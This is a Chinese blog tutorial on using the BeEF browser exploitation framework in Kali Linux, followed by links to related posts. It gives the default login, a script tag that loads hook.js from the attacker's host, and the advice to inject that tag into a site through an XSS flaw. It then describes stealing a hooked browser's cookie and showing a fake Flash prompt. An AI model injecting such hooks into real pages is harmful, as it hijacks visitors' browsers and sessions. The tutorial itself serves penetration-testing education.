BEEF的简介与使用
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。
免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!
一、BEEF简介
BEEF,全程为The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。BEFF集成了很多payload,可以实现很多功能,同时也支持API调用,我们可以自己来编写模块。
在Kali Linux系统上,自动安装了BEFF工具。如下所示:
我们打开BEEF,可以看到如下登录页面:
在上述页面中,给我们提供了两条信息,一条是BEEF的XSS引用地址,即本地IP3000端口下的hook.js;另一条是BEEF的管理页面,即本地地址/ui/panel。
我们此时可以看到在当前Kali Linux已经开始监听3000端口,如下所示:
我们可以访问BEEF的管理页面,如下所示:
我们输入默认的用户名和密码:beef,即可登录BEEF。
二、BEEF渗透测试实战
接下来,我们使用BEEF进行渗透测试的实战。
BEEF把其攻击脚本全部放在了hook.js的脚本中,因此我们需要在页面中将该文件当作JavaScript脚本代码来执行。一个常见的作法是利用某页面的XSS漏洞,这样我们就可以将下列代码:
<script src="http://192.168.136.66:3000/hook.js"></script>
插入到页面中。其中192.168.136.66为Kali Linux的IP地址。这样,所有访问该页面的用户,都会加载BEEF的攻击脚本,然后就会收到BEEF的攻击了。
我们按照上述思路构造页面,然后让浏览器访问该页面,我们就可以在BEEF的管理页面中看到上线的浏览器信息了,如下所示:
我们可以进入右侧command页面,就可以发现有如下图所示的攻击载荷。
在上述攻击载荷中,绿色表示可以使用,并且用户不会察觉,红色表示不可以使用,灰色表示可能能够使用,但是不确定,如果是橙色,则表示可以使用,但是用户会察觉。
我们可以随便选择一个模块,比如或获取目标浏览器的cookie值,那么在执行后结果如下所示:
此外,我们还可以选择webcam,如下所示:
这样,则会令用户浏览器显示一个Adobe Flash的提示,如下所示:
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200
BEEF的简介与使用相关推荐
- 零基础如何学习Web安全渗透测试?推荐这份史上最详细的自学路线图!
第 1 阶段 Web 技术入门 1.0 学习导论 此阶段,我们的学习目标是了解网络安全行业的法律法规 / 学习方法 / 求职目标,搭建属于自己的博客 / 论坛 / 网站(成为一名站长).掌握 Web ...
- 【笔记】web安全基础
web安全基础 前言: 自己总结的web安全基础知识,部分未写完,以后有时间会完善,希望能帮到需要的人. 渗透测试 一.概念 渗透测试(penetration testing|pentest)是实 ...
- 【XSS漏洞06】神器beEF的安装与简介
目录 1 beEF简介 2 beEF安装 3 重要网址 4 简单测试 5 总结 参考文献 1 beEF简介 BeEF 是浏览器开发框架的缩写. 它是一款专注于网络浏览器的渗透测试工具. 随着人们越来越 ...
- 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...
- 【渗透测试工具beef】XSS渗透测试工具beef如何安装使用?
目录 事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1.输入config.xml中配置 ...
- Scala笔记(一)基本简介与基础语法
文章目录 一.Scala 简介 1.1 什么是 Scala 1.2 为什么使用 Scala 二.Scala 环境搭建 2.1 程序编译执行流程 2.2 安装 Scala SDK 2.3 安装 IDEA ...
- kali官方各工具简介(转)
各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 名称 类型 使用模式 功能 功能评价 dmitry 信息收集 whois查询/子域名收集/ ...
- 浏览器利用框架BeEF测试-成功截取微博账号
0x00 前言 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具. 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认 ...
- 【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架
存储型XSS 长期存储于服务器端 每次用于访问都会被执行javascript脚本 Name:客户端表单长度限制 客户端.截断代理 <script src=http://1.1.1.1/a.js& ...
- 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...
最新文章
- chrome 禁用https限制http_HTTP协议走过29年漏洞百出:Firefox可直接禁用
- php用get方式传json数据 变成null了
- MySQL 5.6 my.cnf 参数说明(转)
- NodeJS中使用SQLite3
- 基于MySQL的调度系统_仓储调度系统的设计与实现(SSH,MySQL)
- 不用找了,基于 Redis 的分布式锁实战来了
- 大学“电路分析基础”试题合集第八章
- OSEK 操作系统的基本概念
- Windows动态链接库DLL和静态库的原理以及创建方法
- C++ | 通讯录管理系统
- 捆绑影视IP,玩跨界营销,你真学不会!
- Buy and Resell(贪心好题!)
- azkaban 安装
- 如何用行式 Excel 数据制作不定行列的分组交叉统计表
- 二级计算机的office用到哪些函数,计算机二级MS office excel中所用函数整理
- 计算机网络常见面试题整理
- 成为用友ISV优选伙伴,迈丹科技8个月经历了一次脱胎换骨
- ROMP:Monocular, One-stage, Regression of Multiple 3D People
- play游戏php是多少人,directplay有什么用?
- Vimeo 开启VR内容付费模式,真的能让消费者主动掏钱包吗?
热门文章
- GIS地图学习笔记二之Android开发
- BF算法与KMP算法
- 61_ZYNQ7020开发板_SD/QSPI方式启动_ax_peta
- 前端处理无网络兜底图片展示
- SWUST OJ533你的QQ多少级了?
- 【2D 目标检测】CornerNet: Detecting Objects as Paired Keypoints
- 1741. Communication Fiend(dp)
- java: 不兼容的类型: java.lang.Long无法转换为java.lang.Intege
- 基于java+springboot+mysql的中小型超市进销存管理系统
- HDLC——高级数据链路控制(HDLC,High-level Data Link Control)